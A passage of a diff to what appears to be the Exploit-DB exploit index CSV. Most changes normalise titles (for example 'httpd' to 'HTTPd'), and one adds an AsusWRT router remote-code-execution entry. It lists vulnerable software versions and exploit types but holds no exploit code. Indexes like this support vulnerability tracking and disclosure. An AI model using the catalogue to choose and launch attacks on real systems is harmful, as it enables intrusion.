Remote Code Execution",2012-06-19,"Ben Turner",remote,windows, 19291,exploits/windows/remote/19291.rb,"EZHomeTech EzServer 6.4.017 - Remote Stack Buffer Overflow (Metasploit)",2012-06-19,Metasploit,remote,windows, @@ -12485,7 +12487,7 @@ id,file,description,date,author,type,platform,port 20430,exploits/cgi/remote/20430.txt,"Info2www 1.0/1.1 - CGI Input Handling",1998-03-03,"Niall Smart",remote,cgi, 20433,exploits/cgi/remote/20433.txt,"CGI City CC Whois 1.0 - MetaCharacter",1999-11-09,"Cody T. - hhp",remote,cgi, 20434,exploits/cgi/remote/20434.txt,"Miva htmlscript 2.x - Directory Traversal",1998-01-26,"Dennis Moore",remote,cgi, -20435,exploits/cgi/remote/20435.txt,"Apache 0.8.x/1.0.x / NCSA httpd 1.x - test-cgi Directory Listing",1996-04-01,@stake,remote,cgi, +20435,exploits/cgi/remote/20435.txt,"Apache 0.8.x/1.0.x / NCSA HTTPd 1.x - 'test-cgi' Directory Listing",1996-04-01,@stake,remote,cgi, 20441,exploits/multiple/remote/20441.txt,"IBM Net.Data 7.0 - Full Path Disclosure",2000-11-29,"Chad Kalmes",remote,multiple, 20442,exploits/cgi/remote/20442.html,"Greg Matthews - 'Classifieds.cgi' 1.0 Hidden Variable",1998-12-15,anonymous,remote,cgi, 20444,exploits/cgi/remote/20444.txt,"Greg Matthews - 'Classifieds.cgi' 1.0 MetaCharacter",1998-12-15,anonymous,remote,cgi, @@ -12995,7 +12997,7 @@ id,file,description,date,author,type,platform,port 40347,exploits/unix/remote/40347.txt,"Apache mod_ssl OpenSSL < 0.9.6d / < 0.9.7-beta2 - 'openssl-too-open.c' SSL2 KEY_ARG Overflow",2002-09-17,"Solar Eclipse",remote,unix,80 21675,exploits/windows/remote/21675.pl,"Trillian 0.x IRC Module - Remote Buffer Overflow",2002-07-31,"John C. Hennessy",remote,windows, 21677,exploits/solaris/remote/21677.txt,"Sun AnswerBook2 1.x - Unauthorized Administrative Script Access",2002-08-02,ghandi,remote,solaris, -21678,exploits/solaris/remote/21678.c,"Inso DynaWeb httpd 3.1/4.0.2/4.1 - Format String",2002-08-02,ghandi,remote,solaris, +21678,exploits/solaris/remote/21678.c,"Inso DynaWeb HTTPd 3.1/4.0.2/4.1 - Format String",2002-08-02,ghandi,remote,solaris, 21680,exploits/windows/remote/21680.pl,"Qualcomm Eudora 5 - MIME MultiPart Boundary Buffer Overflow",2002-08-05,Kanatoko,remote,windows, 21681,exploits/windows/remote/21681.html,"Opera 6.0.x - FTP View Cross-Site Scripting",2002-08-06,"Eiji James Yoshida",remote,windows, 21682,exploits/unix/remote/21682.txt,"Mozilla 1.0/1.1 - FTP View Cross-Site Scripting",2002-08-06,"Eiji James Yoshida",remote,unix, @@ -13006,7 +13008,7 @@ id,file,description,date,author,type,platform,port 21697,exploits/windows/remote/21697.txt,"Apache 2.0 - Encoded Backslash Directory Traversal",2002-08-09,"Auriemma Luigi",remote,windows, 21698,exploits/windows/remote/21698.txt,"BlueFace Falcon Web Server 2.0 - Error Message Cross-Site Scripting",2002-08-09,"Matt Murphy",remote,windows, 21699,exploits/hardware/remote/21699.txt,"Orinoco OEM Residential Gateway - SNMP Community String Remote Configuration",2002-08-09,"Foundstone Inc.",remote,hardware, -21704,exploits/unix/remote/21704.txt,"W3C CERN httpd 3.0 Proxy - Cross-Site Scripting",2002-08-12,"TAKAGI Hiromitsu",remote,unix, +21704,exploits/unix/remote/21704.txt,"W3C CERN HTTPd 3.0 Proxy - Cross-Site Scripting",2002-08-12,"TAKAGI Hiromitsu",remote,unix, 21705,exploits/windows/remote/21705.txt,"Microsoft Internet Explorer 6 - File Attachment Script Execution",2002-08-13,http-equiv,remote,windows, 21706,exploits/linux/remote/21706.txt,"RedHat Interchange 4.8.x - Arbitrary File Read",2002-08-13,anonymous,remote,linux, 21707,exploits/windows/remote/21707.txt,"GoAhead Web Server 2.1 - Arbitrary Command Execution",2002-08-14,anonymous,remote,windows, @@ -13079,7 +13081,7 @@ id,file,description,date,author,type,platform,port 21927,exploits/multiple/remote/21927.rb,"Metasploit < 4.4 - pcap_log Plugin Privilege Escalation (Metasploit)",2012-10-12,0a29406d9794e4f9b30b3c5d6702c708,remote,multiple, 21932,exploits/windows/remote/21932.pl,"Microsoft Outlook Express 5.5/6.0 - S/MIME Buffer Overflow",2002-10-10,"Noam Rathaus",remote,windows, 21934,exploits/linux/remote/21934.txt,"KDE 3.0.x - KPF Icon Option File Disclosure",2002-10-11,"Ajay R Ramjatan",remote,linux, -21936,exploits/linux/remote/21936.c,"ATP httpd 0.4 - Single Byte Buffer Overflow",2002-10-05,thread,remote,linux, +21936,exploits/linux/remote/21936.c,"ATP HTTPd 0.4 - Single Byte Buffer Overflow",2002-10-05,thread,remote,linux, 21937,exploits/linux/remote/21937.c,"ghttpd 1.4.x - 'Log()' Remote Buffer Overflow",2002-10-07,flea,remote,linux, 21940,exploits/windows/remote/21940.txt,"Microsoft Internet Explorer 5/6 - Unauthorized Document Object Model Access",2002-10-15,"GreyMagic Software",remote,windows, 21942,exploits/multiple/remote/21942.java,"Ingenium Learning Management System 5.1/6.1 - Reversible Password Hash",2002-10-15,"Brian Enigma",remote,multiple, @@ -13087,7 +13089,7 @@ id,file,description,date,author,type,platform,port 21945,exploits/linux/remote/21945.pl,"PlanetDNS PlanetWeb 1.14 - Remote Buffer Overflow",2002-10-17,"securma massine",remote,linux, 21947,exploits/unix/remote/21947.txt,"IBM Websphere Edge Server 3.6/4.0 - Cross-Site Scripting",2002-10-23,Rapid7,remote,unix, 21948,exploits/unix/remote/21948.txt,"IBM Websphere Edge Server 3.69/4.0 - HTTP Header Injection",2002-10-23,Rapid7,remote,unix, -21955,exploits/windows/remote/21955.java,"AN HTTPD 1.38/1.39/1.40/1.41 - SOCKS4 Request Buffer Overflow",2002-10-21,Kanatoko,remote,windows, +21955,exploits/windows/remote/21955.java,"AN HTTPD 1.38/1.39/1.40/1.41 - 'SOCKS4' Buffer Overflow",2002-10-21,Kanatoko,remote,windows, 21958,exploits/windows/remote/21958.txt,"AOL Instant Messenger 4.8.2790 - Local File Execution",2002-10-22,"Blud Clot",remote,windows, 21959,exploits/windows/remote/21959.txt,"Microsoft Internet Explorer 5/6 - Cached Objects Zone Bypass",2002-10-22,"GreyMagic Software",remote,windows, 21964,exploits/windows/remote/21964.txt,"SolarWinds TFTP Server Standard Edition 5.0.55 - Directory Traversal",2002-10-25,"Matthew Murphy",remote,windows, @@ -13101,8 +13103,8 @@ id,file,description,date,author,type,platform,port 22000,exploits/cgi/remote/22000.txt,"Zeus Web Server 4.0/4.1 - Admin Interface Cross-Site Scripting",2002-11-08,euronymous,remote,cgi, 22001,exploits/windows/remote/22001.txt,"Simple Web Server 0.5.1 - File Disclosure",2002-11-08,"Tamer Sahin",remote,windows, 22007,exploits/windows/remote/22007.txt,"Samsung Kies 2.3.2.12054_20 - Multiple Vulnerabilities",2012-10-16,"High-Tech Bridge SA",remote,windows, -22012,exploits/linux/remote/22012.c,"Light HTTPd 0.1 - GET Buffer Overflow (1)",2002-11-12,Xpl017Elz,remote,linux, -22013,exploits/linux/remote/22013.c,"Light HTTPd 0.1 - GET Buffer Overflow (2)",2002-11-12,uid0x00,remote,linux, +22012,exploits/linux/remote/22012.c,"Light HTTPd 0.1 - 'GET' Buffer Overflow (1)",2002-11-12,Xpl017Elz,remote,linux, +22013,exploits/linux/remote/22013.c,"Light HTTPd 0.1 - 'GET' Buffer Overflow (2)",2002-11-12,uid0x00,remote,linux, 22016,exploits/linux/remote/22016.c,"LibHTTPD 1.2 - POST Buffer Overflow",2002-11-13,Xpl017Elz,remote,linux, 22018,exploits/windows/remote/22018.pl,"Key Focus KF Web Server 1.0.8 - Directory Traversal",2002-11-13,mattmurphy,remote,windows, 22020,exploits/multiple/remote/22020.pl,"Perception LiteServe 2.0 - CGI Source Disclosure",2002-11-14,mattmurphy,remote,multiple, @@ -13882,7 +13884,7 @@ id,file,description,date,author,type,platform,port 25191,exploits/multiple/remote/25191.txt,"JoWood Chaser 1.0/1.50 - Remote Buffer Overflow",2005-03-07,"Luigi Auriemma",remote,multiple, 25194,exploits/windows/remote/25194.txt,"Hosting Controller 1.x/6.1 - Multiple Information Disclosure Vulnerabilities",2005-03-07,"small mouse",remote,windows, 29277,exploits/windows/remote/29277.txt,"Winamp Web interface 7.5.13 - Multiple Vulnerabilities",2006-12-11,"Luigi Auriemma",remote,windows, -24999,exploits/windows/remote/24999.py,"Light HTTPD 0.1 (Windows) - Remote Buffer Overflow",2013-04-25,"Jacob Holcomb",remote,windows, +24999,exploits/windows/remote/24999.py,"Light HTTPd 0.1 (Windows) - Remote Buffer Overflow",2013-04-25,"Jacob Holcomb",remote,windows, 25294,exploits/windows/remote/25294.rb,"Microsoft Internet Explorer - CGenericElement Object Use-After-Free (Metasploit)",2013-05-07,Metasploit,remote,windows, 25001,exploits/linux/remote/25001.rb,"GroundWork - 'monarch_scan.cgi' OS Command Injection (Metasploit)",2013-04-25,Metasploit,remote,linux, 25005,exploits/linux/remote/25005.txt,"NASM 0.98.x - Error Preprocessor Directive Buffer Overflow",2004-12-15,"Jonathan Rockway",remote,linux, @@ -14105,7 +14107,7 @@ id,file,description,date,author,type,platform,port 26622,exploits/php/remote/26622.rb,"InstantCMS 1.6 - PHP Remote Code Execution (Metasploit)",2013-07-05,Metasploit,remote,php, 40386,exploits/hardware/remote/40386.py,"Cisco ASA 9.2(3) - 'EXTRABACON' Authentication Bypass",2016-09-16,"Sean Dillon",remote,hardware,161 26737,exploits/linux_x86/remote/26737.pl,"Nginx 1.3.9/1.4.0 (x86) - Brute Force",2013-07-11,kingcope,remote,linux_x86, -26739,exploits/windows/remote/26739.py,"Ultra Mini HTTPD 1.21 - Remote Stack Buffer Overflow",2013-07-11,superkojiman,remote,windows,80 +26739,exploits/windows/remote/26739.py,"Ultra Mini HTTPd 1.21 - Remote Stack Buffer Overflow",2013-07-11,superkojiman,remote,windows,80 26741,exploits/linux/remote/26741.pl,"Horde IMP 2.2.x/3.2.x/4.0.x - Email Attachments HTML Injection",2005-12-06,"SEC Consult",remote,linux, 26768,exploits/cgi/remote/26768.txt,"ACME Perl-Cal 2.99 - Cal_make.pl Cross-Site Scripting",2005-12-08,$um$id,remote,cgi, 26773,exploits/windows/remote/26773.txt,"LogiSphere 0.9.9 j - 'viewsource.jsp?source' Traversal Arbitrary File Access",2005-12-12,dr_insane,remote,windows, @@ -14170,7 +14172,7 @@ id,file,description,date,author,type,platform,port 27806,exploits/windows/remote/27806.txt,"BankTown ActiveX Control 1.4.2.51817/1.5.2.50209 - Remote Buffer Overflow",2006-05-03,"Gyu Tae",remote,windows, 27606,exploits/windows/remote/27606.rb,"Intrasrv 1.0 - Remote Buffer Overflow (Metasploit)",2013-08-15,Metasploit,remote,windows,80 27607,exploits/windows/remote/27607.rb,"MiniWeb 300 - Arbitrary File Upload (Metasploit)",2013-08-15,Metasploit,remote,windows,8000 -27608,exploits/windows/remote/27608.rb,"Ultra Mini HTTPD - Remote Stack Buffer Overflow (Metasploit)",2013-08-15,Metasploit,remote,windows,80 +27608,exploits/windows/remote/27608.rb,"Ultra Mini HTTPd - Remote Stack Buffer Overflow (Metasploit)",2013-08-15,Metasploit,remote,windows,80 27610,exploits/php/remote/27610.rb,"Joomla! Component Media Manager - Arbitrary File Upload (Metasploit)",2013-08-15,Metasploit,remote,php,80 27611,exploits/windows/remote/27611.txt,"Oracle Java - 'IntegerInterleavedRaster.verify()' Signed Integer Overflow",2013-08-15,"Packet Storm",remote,windows, 27627,exploits/windows/remote/27627.txt,"Saxopress - 'URL' Directory Traversal",2006-04-11,SecuriTeam,remote,windows, @@ -14278,7 +14280,7 @@ id,file,description,date,author,type,platform,port 28501,exploits/multiple/remote/28501.xml,"Sage 1.3.6 - Input Validation",2006-09-08,pdp,remote,multiple, 28508,exploits/hardware/remote/28508.rb,"Raidsonic NAS Devices - Unauthenticated Remote Command Execution (Metasploit)",2013-09-24,Metasploit,remote,hardware, 28512,exploits/windows/remote/28512.txt,"paul smith computer services vcap Calendar server 1.9 - Directory Traversal",2009-09-12,"securma massine",remote,windows, -28595,exploits/linux/remote/28595.txt,"BusyBox 1.01 - HTTPD Directory Traversal",2006-09-16,bug-finder,remote,linux, +28595,exploits/linux/remote/28595.txt,"BusyBox 1.01 - HTTPd Directory Traversal",2006-09-16,bug-finder,remote,linux, 28602,exploits/multiple/remote/28602.txt,"OSU HTTP Server 3.10/3.11 - Multiple Information Disclosure Vulnerabilities",2006-09-19,"Julio Cesar Fort",remote,multiple, 28639,exploits/linux/remote/28639.rb,"Apple QuickTime 7.1.3 PlugIn - Arbitrary Script Execution",2006-09-21,LMH,remote,linux, 28640,exploits/windows/remote/28640.txt,"CA eSCC r8/1.0 / eTrust Audit r8/1.5 - Web Server Full Path Disclosure",2006-09-21,"Patrick Webster",remote,windows, @@ -14660,7 +14662,7 @@ id,file,description,date,author,type,platform,port 31694,exploits/windows/remote/31694.py,"Eudora Qualcomm WorldMail 9.0.333.0 - IMAPd Service UID Buffer Overflow",2014-02-16,"Muhammad ELHarmeel",remote,windows, 31695,exploits/php/remote/31695.rb,"Dexter (CasinoLoader) - SQL Injection (Metasploit)",2014-02-16,Metasploit,remote,php, 31706,exploits/unix/remote/31706.txt,"IBM Lotus Expeditor 6.1 - URI Handler Command Execution",2008-04-24,"Thomas Pollet",remote,unix, -31736,exploits/windows/remote/31736.py,"Ultra Mini HTTPD 1.21 - 'POST' Remote Stack Buffer Overflow (1)",2014-02-18,Sumit,remote,windows,80 +31736,exploits/windows/remote/31736.py,"Ultra Mini HTTPd 1.21 - 'POST' Remote Stack Buffer Overflow (1)",2014-02-18,Sumit,remote,windows,80 31737,exploits/windows/remote/31737.rb,"Oracle Forms and Reports - Remote Code Execution (Metasploit)",2014-02-18,Metasploit,remote,windows, 31756,exploits/multiple/remote/31756.txt,"SonicWALL Email Security 6.1.1 - Error Page Cross-Site Scripting",2008-05-08,"Deniz Cevik",remote,multiple, 31757,exploits/multiple/remote/31757.txt,"ZyWALL 100 HTTP Referer Header - Cross-Site Scripting",2008-05-08,"Deniz Cevik",remote,multiple, @@ -14671,7 +14673,7 @@ id,file,description,date,author,type,platform,port 31770,exploits/multiple/remote/31770.txt,"Oracle Application Server Portal 10g - Authentication Bypass",2008-05-09,"Deniz Cevik",remote,multiple, 31788,exploits/windows/remote/31788.py,"VideoCharge Studio 2.12.3.685 - 'GetHttpResponse()' Man In The Middle Remote Code Execution",2014-02-20,"Julien Ahrens",remote,windows, 31789,exploits/windows/remote/31789.py,"PCMan FTP Server 2.07 - Remote Buffer Overflow",2014-02-20,Sumit,remote,windows,21 -31814,exploits/windows/remote/31814.py,"Ultra Mini HTTPD 1.21 - 'POST' Remote Stack Buffer Overflow (2)",2014-02-22,"OJ Reeves",remote,windows,80 +31814,exploits/windows/remote/31814.py,"Ultra Mini HTTPd 1.21 - 'POST' Remote Stack Buffer Overflow (2)",2014-02-22,"OJ Reeves",remote,windows,80 31820,exploits/unix/remote/31820.pl,"IBM Lotus Sametime 8.0 - Multiplexer Buffer Overflow",2008-05-21,"Manuel Santamarina Suarez",remote,unix, 31828,exploits/hardware/remote/31828.txt,"Barracuda Spam Firewall 3.5.11 - 'ldap_test.cgi' Cross-Site Scripting",2008-05-22,"Information Risk Management Plc",remote,hardware, 31831,exploits/windows/remote/31831.py,"SolidWorks Workgroup PDM 2014 SP2 - Arbitrary File Write",2014-02-22,"Mohamed Shetta",remote,windows,30000 @@ -15168,8 +15170,8 @@ id,file,description,date,author,type,platform,port 34870,exploits/windows/remote/34870.html,"VideoLAN VLC Media Player 1.1.4 Mozilla MultiMedia Plugin - Remote Code Execution",2010-10-19,shinnai,remote,windows, 34879,exploits/linux/remote/34879.txt,"OpenVPN 2.2.29 - 'Shellshock' Remote Command Injection",2014-10-04,"hobbily plunt",remote,linux, 34881,exploits/linux/remote/34881.html,"Mozilla Firefox SeaMonkey 3.6.10 / Thunderbird 3.1.4 - 'document.write' Memory Corruption",2010-10-19,"Alexander Miller",remote,linux, -34896,exploits/linux/remote/34896.py,"Postfix SMTP 4.2.x < 4.2.48 - 'Shellshock' Remote Command Injection",2014-10-06,"Phil Blank",remote,linux, -34900,exploits/linux/remote/34900.py,"Apache mod_cgi - 'Shellshock' Remote Command Injection",2014-10-06,"Federico Galatolo",remote,linux, +34896,exploits/linux/remote/34896.py,"Postfix SMTP 4.2.x < 4.2.48 - 'Shellshock' Remote Command Injection",2014-10-06,"Phil Blank",remote,linux, +34900,exploits/linux/remote/34900.py,"Apache mod_cgi - 'Shellshock' Remote Command Injection",2014-10-06,"Federico Galatolo",remote,linux, 34925,exploits/php/remote/34925.rb,"WordPress Plugin InfusionSoft - Arbitrary File Upload (Metasploit)",2014-10-09,Metasploit,remote,php,80 34926,exploits/windows/remote/34926.rb,"Rejetto HTTP File Server (HFS) - Remote Command Execution (Metasploit)",2014-10-09,Metasploit,remote,windows,80 34927,exploits/unix/remote/34927.rb,"F5 iControl - Remote Command Execution (Metasploit)",2014-10-09,Metasploit,remote,unix,443 @@ -15777,7 +15779,7 @@ id,file,description,date,author,type,platform,port 39874,exploits/windows/remote/39874.rb,"HP Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (Metasploit)",2016-05-31,"Ian Lovering",remote,windows, 39907,exploits/windows/remote/39907.rb,"Poison Ivy 2.1.x (C2 Server) - Remote Buffer Overflow (Metasploit)",2016-06-10,"Jos Wetzels",remote,windows,3460 39917,exploits/cgi/remote/39917.rb,"IPFire - 'proxy.cgi' Remote Code Execution (Metasploit)",2016-06-10,Metasploit,remote,cgi,444 -39918,exploits/cgi/remote/39918.rb,"IPFire - 'Shellshock' Bash Environment Variable Command Injection (Metasploit)",2016-06-10,Metasploit,remote,cgi,444 +39918,exploits/cgi/remote/39918.rb,"IPFire - 'Shellshock' Bash Environment Variable Command Injection (Metasploit)",2016-06-10,Metasploit,remote,cgi,444 39919,exploits/multiple/remote/39919.rb,"Apache Struts - REST Plugin With Dynamic Method Invocation Remote Code Execution (Metasploit)",2016-06-10,Metasploit,remote,multiple,8080 40441,exploits/hardware/remote/40441.py,"Grandsteam GXV3611_HD - SQL Injection",2016-09-29,pizza1337,remote,hardware, 39945,exploits/linux/remote/39945.rb,"Apache Continuum - Arbitrary Command Execution (Metasploit)",2016-06-14,Metasploit,remote,linux,8080 @@ -15836,9 +15838,10 @@ id,file,description,date,author,type,platform,port 43659,exploits/hardware/remote/43659.md,"Seagate Personal Cloud - Multiple Vulnerabilities",2018-01-11,SecuriTeam,remote,hardware, 43665,exploits/multiple/remote/43665.md,"Transmission - RPC DNS Rebinding",2018-01-11,"Google Security Research",remote,multiple,9091 43693,exploits/hardware/remote/43693.txt,"Master IP CAM 01 - Multiple Vulnerabilities",2018-01-17,"Raffaele Sabato",remote,hardware, +43881,exploits/hardware/remote/43881.txt,"AsusWRT Router < 3.0.0.4.380.7743 - Unauthenticated LAN Remote Code Execution",2018-01-22,"Pedro Ribeiro",remote,hardware, 43871,exploits/hardware/remote/43871.py,"RAVPower 2.000.056 - Root Remote Code Execution",2018-01-24,"Daniele Linguaglossa & Stefano Farletti",remote,hardware, 43876,exploits/php/remote/43876.rb,"Kaltura - Remote PHP Code Execution over Cookie (Metasploit)",2018-01-24,Metasploit,remote,php, -43877,exploits/multiple/remote/43877.rb,"GoAhead Web Server - 'LD_PRELOAD' Arbitrary Module Load (Metasploit)",2018-01-24,Metasploit,remote,multiple, +43877,exploits/multiple/remote/43877.rb,"GoAhead Web Server 2.5 < 3.6.5 - HTTPd 'LD_PRELOAD' Arbitrary Module Load (Metasploit)",2018-01-24,Metasploit,remote,multiple, 40561,exploits/multiple/remote/40561.rb,"Ruby on Rails - Dynamic Render File Upload / Remote Code Execution (Metasploit)",2016-10-17,Metasploit,remote,multiple, 40589,exploits/hardware/remote/40589.html,"MiCasaVerde VeraLite - Remote Code Execution",2016-10-20,"Jacob Baines",remote,hardware, 40609,exploits/linux/remote/40609.rb,"Hak5 WiFi Pineapple 2.4 - Preconfiguration Command Injection (Metasploit)",2016-10-20,Metasploit,remote,linux,1471 @@ -15929,7 +15932,7 @@ id,file,description,date,author,type,platform,port 41614,exploits/multiple/remote/41614.rb,"Apache Struts Jakarta - Multipart Parser OGNL Injection (Metasploit)",2017-03-15,Metasploit,remote,multiple,8080 43353,exploits/android/remote/43353.py,"Outlook for Android - Attachment Download Directory Traversal",2017-12-18,"Google Security Research",remote,android, 43356,exploits/php/remote/43356.rb,"Western Digital MyCloud - 'multi_uploadify' File Upload (Metasploit)",2017-12-18,Metasploit,remote,php, -43360,exploits/linux/remote/43360.py,"GoAhead httpd 2.5 < 3.6.5 - 'LD_PRELOAD' Remote Code Execution",2017-12-18,"Daniel Hodson",remote,linux,80 +43360,exploits/linux/remote/43360.py,"GoAhead Web Server 2.5 < 3.6.5 - HTTPd 'LD_PRELOAD' Remote Code Execution",2017-12-18,"Daniel Hodson",remote,linux,80 43374,exploits/php/remote/43374.rb,"Tuleap 9.6 - Second-Order PHP Object Injection (Metasploit)",2017-12-19,Metasploit,remote,php,443 43375,exploits/multiple/remote/43375.rb,"Jenkins - XStream Groovy classpath Deserialization (Metasploit)",2017-12-19,Metasploit,remote,multiple,8080 43376,exploits/android/remote/43376.rb,"Samsung Internet Browser - SOP Bypass (Metasploit)",2017-12-20,"Dhiraj Mishra",remote,android, @@ -15981,7 +15984,7 @@ id,file,description,date,author,type,platform,port 41987,exploits/windows/remote/41987.py,"Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)",2017-05-10,"Juan Sacco",remote,windows, 42287,exploits/android/remote/42287.txt,"eVestigator Forensic PenTester - Man In The Middle Remote Code Execution",2017-06-30,intern0t,remote,android, 41718,exploits/hardware/remote/41718.txt,"Miele Professional PG 8528 - Directory Traversal",2017-03-24,"Jens Regel",remote,hardware, -41719,exploits/hardware/remote/41719.rb,"NETGEAR WNR2000v5 - Unauthenticated 'hidden_lang_avi' Remote Stack Overflow (Metasploit)",2017-03-24,Metasploit,remote,hardware,80 +41719,exploits/hardware/remote/41719.rb,"NETGEAR WNR2000v5 - Unauthenticated 'hidden_lang_avi' Remote Stack Overflow (Metasploit)",2017-03-24,"Pedro Ribeiro",remote,hardware,80 41720,exploits/python/remote/41720.rb,"Logsign 4.4.2/4.4.137 - Remote Command Injection (Metasploit)",2017-03-24,"Mehmet Ince",remote,python, 41738,exploits/windows/remote/41738.py,"Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow",2017-03-27,"Zhiniang Peng & Chen Wu",remote,windows, 41740,exploits/multiple/remote/41740.txt,"Samba 4.5.2 - Symlink Race Permits Opening Files Outside Share Directory",2017-03-27,"Google Security Research",remote,multiple, @@ -23446,7 +23449,7 @@ id,file,description,date,author,type,platform,port 12510,exploits/php/webapps/12510.php,"PHP-Nuke 7.0/8.1/8.1.35 - Wormable Remote Code Execution",2010-05-05,"Michael Brooks",webapps,php, 12514,exploits/php/webapps/12514.txt,"PHP-Nuke 5.0 - Viewslink SQL Injection",2010-05-05,CMD,webapps,php, 12515,exploits/php/webapps/12515.txt,"Slooze PHP Web Photo Album 0.2.7 - Command Execution",2010-05-05,"Sn!pEr.S!Te Hacker",webapps,php, -12517,exploits/php/webapps/12517.txt,"Getsimple 2.01 - Local File Inclusion",2010-05-06,Batch,webapps,php, +12517,exploits/php/webapps/12517.txt,"Getsimple CMS 2.01 - Local File Inclusion",2010-05-06,Batch,webapps,php, 12519,exploits/php/webapps/12519.txt,"AV Arcade - 'Search' Cross-Site Scripting / HTML Injection",2010-05-06,"Vadim Toptunov",webapps,php, 12520,exploits/php/webapps/12520.html,"OCS Inventory NG Server 1.3.1 - 'LOGIN' Remote Authentication Bypass",2010-05-06,"Nicolas DEROUET",webapps,php, 12521,exploits/php/webapps/12521.txt,"Factux - Local File Inclusion",2010-05-06,ALTBTA,webapps,php, @@ -28289,7 +28292,7 @@ id,file,description,date,author,type,platform,port 26295,exploits/php/webapps/26295.txt,"PHPMyFAQ 1.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2005-09-23,rgod,webapps,php, 26296,exploits/php/webapps/26296.txt,"PHPMyFAQ 1.5.1 - Local File Inclusion",2005-08-23,rgod,webapps,php, 26009,exploits/php/webapps/26009.txt,"AfterLogic WebMail Lite PHP 7.0.1 - Cross-Site Request Forgery",2013-06-07,"Pablo Ribeiro",webapps,php, -26012,exploits/windows/webapps/26012.rb,"Novell Zenworks Mobile Device Managment 2.6.1/2.7.0 - Local File Inclusion (Metasploit)",2013-06-07,Metasploit,webapps,windows,80 +26012,exploits/windows/webapps/26012.rb,"Novell ZENworks Mobile Device Managment 2.6.1/2.7.0 - Local File Inclusion (Metasploit)",2013-06-07,Metasploit,webapps,windows,80 26014,exploits/php/webapps/26014.txt,"FForm Sender 1.0 - 'Processform.php3?Name' Cross-Site Scripting",2005-07-19,rgod,webapps,php, 26015,exploits/php/webapps/26015.txt,"Form Sender 1.0 - 'Processform.php3?Failed' Cross-Site Scripting",2005-07-19,rgod,webapps,php, 26016,exploits/php/webapps/26016.txt,"PHPNews 1.2.x - 'auth.php' SQL Injection",2005-07-20,GHC,webapps,php, @@ -31033,7 +31036,7 @@ id,file,description,date,author,type,platform,port 30191,exploits/jsp/webapps/30191.txt,"Apache MyFaces Tomahawk JSF Framework 1.1.5 - 'Autoscroll' Cross-Site Scripting",2007-06-14,"Rajat Swarup",webapps,jsp, 29672,exploits/php/webapps/29672.txt,"LiveZilla 5.0.1.4 - Remote Code Execution",2013-11-18,"Curesec Research Team",webapps,php,80 29673,exploits/hardware/webapps/29673.txt,"Dahua DVR 2.608.0000.0/2.608.GV00.0 - Authentication Bypass (Metasploit)",2013-11-18,"Jake Reynolds",webapps,hardware,37777 -29674,exploits/jsp/webapps/29674.txt,"ManageEngine DesktopCentral 8.0.0 build < 80293 - Arbitrary File Upload",2013-11-18,Security-Assessment.com,webapps,jsp, +29674,exploits/jsp/webapps/29674.txt,"ManageEngine Desktop Central 8.0.0 build < 80293 - Arbitrary File Upload",2013-11-18,Security-Assessment.com,webapps,jsp, 29675,exploits/asp/webapps/29675.txt,"Kaseya < 6.3.0.2 - Arbitrary File Upload",2013-11-18,Security-Assessment.com,webapps,asp, 29789,exploits/php/webapps/29789.txt,"LimeSurvey 2.00+ (build 131107) - Multiple Vulnerabilities",2013-11-23,LiquidWorm,webapps,php, 29694,exploits/php/webapps/29694.txt,"S9Y Serendipity 1.1.1 - 'index.php' SQL Injection",2007-03-01,Samenspender,webapps,php, @@ -33866,8 +33869,8 @@ id,file,description,date,author,type,platform,port 34511,exploits/php/webapps/34511.txt,"Mulitple WordPress Themes - 'admin-ajax.php?img' Arbitrary File Download",2014-09-01,"Hugo Santiago",webapps,php,80 34513,exploits/multiple/webapps/34513.txt,"Arachni Web Application Scanner Web UI - Persistent Cross-Site Scripting",2014-09-01,"Prakhar Prasad",webapps,multiple, 34514,exploits/php/webapps/34514.txt,"WordPress Plugin Slideshow Gallery 1.4.6 - Arbitrary File Upload",2014-09-01,"Jesus Ramirez Pichardo",webapps,php,80 -34518,exploits/jsp/webapps/34518.txt,"ManageEngine DesktopCentral - Arbitrary File Upload / Remote Code Execution",2014-09-01,"Pedro Ribeiro",webapps,jsp, -34519,exploits/jsp/webapps/34519.txt,"ManageEngine EventLog Analyzer - Multiple Vulnerabilities",2014-09-01,"Hans-Martin Muench",webapps,jsp,8400 +34518,exploits/jsp/webapps/34518.txt,"ManageEngine Desktop Central - Arbitrary File Upload / Remote Code Execution",2014-09-01,"Pedro Ribeiro",webapps,jsp, +34519,exploits/jsp/webapps/34519.txt,"ManageEngine EventLog Analyzer - Multiple Vulnerabilities (1)",2014-09-01,"Hans-Martin Muench",webapps,jsp,8400 34524,exploits/php/webapps/34524.txt,"WordPress Plugin Huge-IT Image Gallery 1.0.1 - Authenticated SQL Injection",2014-09-02,"Claudio Viviani",webapps,php,80 34525,exploits/multiple/webapps/34525.txt,"Syslog LogAnalyzer 3.6.5 - Persistent Cross-Site Scripting (Python)",2014-09-02,"Dolev Farhi",webapps,multiple, 34637,exploits/php/webapps/34637.txt,"Joomla! Component com_formmaker 3.4 - SQL Injection",2014-09-12,"Claudio Viviani",webapps,php, @@ -34133,7 +34136,7 @@ id,file,description,date,author,type,platform,port 34892,exploits/php/webapps/34892.txt,"pecio CMS 2.0.5 - 'target' Cross-Site Scripting",2010-10-21,"Antu Sanadi",webapps,php, 34893,exploits/php/webapps/34893.txt,"PHP Scripts Now (Multiple Products) - 'bios.php?rank' Cross-Site Scripting",2009-07-20,"599eme Man",webapps,php, 34894,exploits/php/webapps/34894.txt,"PHP Scripts Now (Multiple Products) - 'bios.php?rank' SQL Injection",2009-07-20,"599eme Man",webapps,php, -34895,exploits/cgi/webapps/34895.rb,"Bash CGI - 'Shellshock' Remote Command Injection (Metasploit)",2014-10-06,"Fady Mohammed Osman",webapps,cgi, +34895,exploits/cgi/webapps/34895.rb,"Bash CGI - 'Shellshock' Remote Command Injection (Metasploit)",2014-10-06,"Fady Mohammed Osman",webapps,cgi, 34922,exploits/php/webapps/34922.txt,"WordPress Plugin Creative Contact Form 0.9.7 - Arbitrary File Upload",2014-10-08,"Gianni Angelozzi",webapps,php, 35023,exploits/php/webapps/35023.txt,"Wernhart Guestbook 2001.03.28 - Multiple SQL Injections",2010-11-29,"Aliaksandr Hartsuyeu",webapps,php, 35024,exploits/php/webapps/35024.txt,"Joomla! Component Catalogue - SQL Injection / Local File Inclusion",2010-11-30,XroGuE,webapps,php, @@ -34635,7 +34638,7 @@ 